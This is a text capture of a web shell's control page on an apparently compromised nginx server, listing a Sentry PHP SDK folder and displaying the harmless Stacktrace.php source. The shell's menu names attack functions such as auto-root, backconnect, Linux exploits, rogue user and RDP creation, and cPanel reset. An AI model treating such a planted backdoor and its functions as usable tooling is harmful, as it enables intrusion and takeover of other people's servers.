Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
vendor /
sentry /
sentry /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Context
[ DIR ]
drwxrwxr-x
Exception
[ DIR ]
drwxrwxr-x
HttpClient
[ DIR ]
drwxrwxr-x
Integration
[ DIR ]
drwxrwxr-x
Monolog
[ DIR ]
drwxrwxr-x
Serializer
[ DIR ]
drwxrwxr-x
State
[ DIR ]
drwxrwxr-x
Tracing
[ DIR ]
drwxrwxr-x
Transport
[ DIR ]
drwxrwxr-x
Util
[ DIR ]
drwxrwxr-x
Breadcrumb.php
7.82
KB
-rw-rw-r--
Client.php
10.24
KB
-rw-rw-r--
ClientBuilder.php
5.02
KB
-rw-rw-r--
ClientBuilderInterface.php
2.95
KB
-rw-rw-r--
ClientInterface.php
2.77
KB
-rw-rw-r--
Dsn.php
6.51
KB
-rw-rw-r--
ErrorHandler.php
15.16
KB
-rw-rw-r--
Event.php
15.14
KB
-rw-rw-r--
EventHint.php
1.9
KB
-rw-rw-r--
EventId.php
868
B
-rw-rw-r--
EventType.php
1.19
KB
-rw-rw-r--
ExceptionDataBag.php
2.49
KB
-rw-rw-r--
ExceptionMechanism.php
1.67
KB
-rw-rw-r--
Frame.php
6.63
KB
-rw-rw-r--
FrameBuilder.php
8.03
KB
-rw-rw-r--
Options.php
29.08
KB
-rw-rw-r--
Response.php
1017
B
-rw-rw-r--
ResponseStatus.php
2.97
KB
-rw-rw-r--
SentrySdk.php
1.24
KB
-rw-rw-r--
Severity.php
3.85
KB
-rw-rw-r--
Stacktrace.php
2.4
KB
-rw-rw-r--
StacktraceBuilder.php
2.39
KB
-rw-rw-r--
UserDataBag.php
5.29
KB
-rw-rw-r--
functions.php
4.03
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Stacktrace.php
<?php declare(strict_types=1); namespace Sentry; /** * This class contains all the information about an error stacktrace. * * @author Stefano Arlandini <sarlandini@alice.it> */ final class Stacktrace { /** * @var Frame[] The frames that compose the stacktrace */ private $frames = []; /** * Constructor. * * @param Frame[] $frames A non-empty list of stack frames. The list must be * ordered from caller to callee. The last frame is the * one creating the exception */ public function __construct(array $frames) { if (empty($frames)) { throw new \InvalidArgumentException('Expected a non empty list of frames.'); } foreach ($frames as $frame) { if (!$frame instanceof Frame) { throw new \UnexpectedValueException(sprintf('Expected an instance of the "%s" class. Got: "%s".', Frame::class, get_debug_type($frame))); } } $this->frames = $frames; } /** * Gets the stacktrace frames. * * @return Frame[] */ public function getFrames(): array { return $this->frames; } /** * Gets the frame at the given index. * * @param int $index The index from which the frame should be get * * @throws \OutOfBoundsException */ public function getFrame(int $index): Frame { if ($index < 0 || $index >= \count($this->frames)) { throw new \OutOfBoundsException(); } return $this->frames[$index]; } /** * Adds a new frame to the stacktrace. * * @param Frame $frame The frame */ public function addFrame(Frame $frame): void { array_unshift($this->frames, $frame); } /** * Removes the frame at the given index from the stacktrace. * * @param int $index The index of the frame * * @throws \OutOfBoundsException If the index is out of range */ public function removeFrame(int $index): void { if (!isset($this->frames[$index])) { throw new \OutOfBoundsException(sprintf('Cannot remove the frame at index %d.', $index)); } if (1 === \count($this->frames)) { throw new \RuntimeException('Cannot remove all frames from the stacktrace.'); } array_splice($this->frames, $index, 1); } }
Close